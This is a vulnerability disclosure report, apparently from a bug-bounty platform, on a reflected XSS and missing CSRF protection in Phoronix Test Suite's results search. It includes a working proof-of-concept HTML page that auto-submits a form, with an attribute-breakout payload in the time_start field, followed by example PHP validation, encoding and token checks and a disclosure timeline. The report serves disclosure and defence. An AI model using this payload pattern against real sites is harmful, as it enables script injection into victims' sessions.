Cross-site Scripting (XSS) - Reflected in phoronix-test-suite/phoronix-test-suite

Valid

Reported on

Feb 9th 2022


Description

Hi, I found a reflected XSS vulnerability (POST-based XSS + no CSRF token) in the Results tab of phoronix test suite.

Proof of Concept

Install a local instance of phoronix.
Create a search results form like this:
// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8222/?results" method="POST">
      <input type="hidden" name="time_start" value="2022&#45;02&#45;08&quot;onfocus&#61;&quot;confirm&#40;origin&#41;&quot;autofocus&#61;&quot;" />
      <input type="hidden" name="time_end" value="2022-02-09" />
      <input type="hidden" name="containing_tests" value="testt" />
      <input type="hidden" name="result_limit" value="100" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
//
and send it to the victim. The victim clicks on the link, resulting in reflected cross-site scripting.

Impact

This vulnerability is capable of Reflected XSS
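
Decoded, the `time_start` value in the PoC form closes a double-quoted HTML attribute and appends an event handler, and the missing CSRF token is what lets a cross-site form deliver it. The following PHP is an added example of the matching server-side checks; it is not part of the original report and is not the project's fix in commit 1eac92. The function names and the `csrf_token` field are hypothetical, and it assumes the value is echoed into a double-quoted attribute.

```php
<?php
// Added example: hypothetical helpers, not code from phoronix-test-suite.

// Accept only a real calendar date in YYYY-MM-DD form; anything else is dropped.
function clean_date($raw): ?string
{
    if (!is_string($raw) || !preg_match('/\A\d{4}-\d{2}-\d{2}\z/', $raw)) {
        return null;
    }
    [$y, $m, $d] = array_map('intval', explode('-', $raw));
    return checkdate($m, $d, $y) ? $raw : null;
}

// Encode for an HTML attribute context; quotes are escaped so the value cannot close the attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constant-time comparison of the posted token with the one held in the session.
function csrf_ok(?string $sessionToken, $postedToken): bool
{
    return is_string($sessionToken) && $sessionToken !== ''
        && is_string($postedToken) && hash_equals($sessionToken, $postedToken);
}

// Builds the date field of the search form from POST data (assumed field layout).
function render_time_start(array $post, ?string $sessionToken): string
{
    if (!csrf_ok($sessionToken, $post['csrf_token'] ?? null)) {
        return '<p>Request rejected: missing or invalid token.</p>';
    }
    $date = clean_date($post['time_start'] ?? null) ?? '';
    return '<input type="date" name="time_start" value="' . attr($date) . '" />';
}

// Constructed sample input: the decoded time_start value from the PoC form above.
$payload = '2022-02-08"onfocus="confirm(origin)"autofocus="';
$token = bin2hex(random_bytes(16)); // stands in for a per-session token

echo render_time_start(['time_start' => $payload, 'csrf_token' => $token], $token), "\n";      // fails date validation
echo render_time_start(['time_start' => '2022-02-08', 'csrf_token' => $token], $token), "\n";  // valid date, valid token
echo render_time_start(['time_start' => '2022-02-08'], $token), "\n";                          // cross-site form: no token
echo '<input value="' . attr($payload) . '" />', "\n";                                         // encoding alone, no validation
```

Validation and encoding are independent layers: the last line shows that attribute encoding by itself already keeps the payload inside the `value` attribute.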

We are processing your report and will contact the phoronix-test-suite team within 24 hours. a year ago
Andy modified the report a year ago
We have contacted a member of the phoronix-test-suite team and are waiting to hear back a year ago
phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability a year ago
Andy has been awarded the disclosure bounty
The fix bounty is now up for grabs
phoronix-test-suite/phoronix-test-suite maintainer marked this as fixed in 10.8.2 with commit 1eac92 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE